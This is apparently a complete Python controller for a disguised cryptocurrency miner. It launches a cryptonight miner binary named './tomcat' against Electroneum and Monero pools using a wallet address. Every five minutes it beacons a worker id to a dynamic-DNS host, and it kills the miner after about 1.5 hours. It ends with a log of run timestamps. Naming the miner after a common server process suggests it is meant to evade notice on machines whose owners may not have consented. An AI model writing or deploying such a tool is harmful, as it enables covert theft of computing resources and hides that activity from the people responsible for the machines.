import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:05.903772
#2018-02-17 16:39:03.887084
#2018-02-17 18:27:01.420731
#2018-02-17 20:16:04.859036
#2018-02-17 22:03:03.991038
#2018-02-17 23:47:05.010175
#2018-02-18 01:38:04.128613
#2018-02-18 03:25:03.152559
#2018-02-18 05:13:01.255613
#2018-02-18 07:05:06.362141
#2018-02-18 08:53:06.686743
#2018-02-18 10:40:06.806607
#2018-02-18 12:25:04.959868
#2018-02-18 14:12:07.546163
#2018-02-18 16:02:05.172455
#2018-02-18 17:52:01.575876
#2018-02-18 19:39:08.139479
#2018-02-18 21:24:06.260408
#2018-02-18 23:13:05.878623
#2018-02-19 00:59:05.348460
#2018-02-19 02:47:05.110542
#2018-02-19 04:33:05.702790
#2018-02-19 06:18:06.886017
#2018-02-19 08:07:06.203604
#2018-02-19 09:57:05.242930
#2018-02-19 11:47:04.032348
#2018-02-19 13:34:01.527295
#2018-02-19 15:23:01.345894
#2018-02-19 17:11:04.460563
#2018-02-19 18:57:07.989576
#2018-02-19 20:44:07.948778
#2018-02-19 22:32:02.113111
#2018-02-20 00:17:01.945967
#2018-02-20 02:05:07.377460
#2018-02-20 03:56:05.248575
#2018-02-20 05:40:02.667404
#2018-02-20 07:26:07.221006
#2018-02-20 09:11:03.642149
#2018-02-20 10:54:06.308184
#2018-02-20 12:42:04.538106
#2018-02-20 14:27:01.503949
#2018-02-20 16:12:07.896726
#2018-02-20 17:58:06.822018
#2018-02-20 19:49:09.259650
#2018-02-20 21:40:01.362602
#2018-02-20 23:21:05.746920
#2018-02-21 01:04:07.588909
#2018-02-21 02:50:08.609586
#2018-02-21 04:39:07.458873
#2018-02-21 06:28:07.380870
#2018-02-21 08:13:01.888542
#2018-02-21 10:00:12.399281
#2018-02-21 11:48:06.994931
#2018-02-21 13:40:08.902608
#2018-02-21 15:25:06.869817
#2018-02-21 17:15:03.344092
#2018-02-21 19:02:05.714188
#2018-02-21 20:50:04.418827
#2018-02-21 22:34:08.024435
#2018-02-22 00:23:08.591938
#2018-02-22 02:11:06.997428
#2018-02-22 03:58:05.710791
#2018-02-22 05:45:09.904751
#2018-02-22 07:32:04.357745
#2018-02-22 09:19:06.532665
#2018-02-22 11:06:02.147887
#2018-02-22 12:53:04.976885
#2018-02-22 14:39:01.398622
#2018-02-22 16:24:07.826307
#2018-02-22 18:10:11.836121
#2018-02-22 19:58:08.107490
#2018-02-22 21:47:01.311221
#2018-02-22 23:36:05.743656
#2018-02-23 01:25:06.582117
#2018-02-23 03:11:04.867339
#2018-02-23 04:59:01.459142
#2018-02-23 06:45:06.589190
#2018-02-23 08:36:07.241881
#2018-02-23 10:51:05.972839
#2018-02-23 12:48:06.180336
#2018-02-23 14:33:08.302974
#2018-02-23 16:23:01.594364
#2018-02-23 18:10:08.503052
#2018-02-23 19:54:08.616447
#2018-02-23 21:39:08.603130
#2018-02-23 23:29:05.670324
#2018-02-24 01:20:06.752728
#2018-02-24 03:11:07.744642
#2018-02-24 04:56:07.237110
#2018-02-24 06:44:04.118271
#2018-02-24 08:41:06.447074
#2018-02-24 10:25:07.581282
#2018-02-24 12:20:07.532429
#2018-02-24 14:13:05.144143
#2018-02-24 16:00:09.057140
#2018-02-24 17:52:01.675638
#2018-02-24 19:39:01.261371
#2018-02-24 21:26:07.603624
#2018-02-25 00:09:03.916987
#2018-02-25 03:20:07.588565
#2018-02-25 07:08:06.042555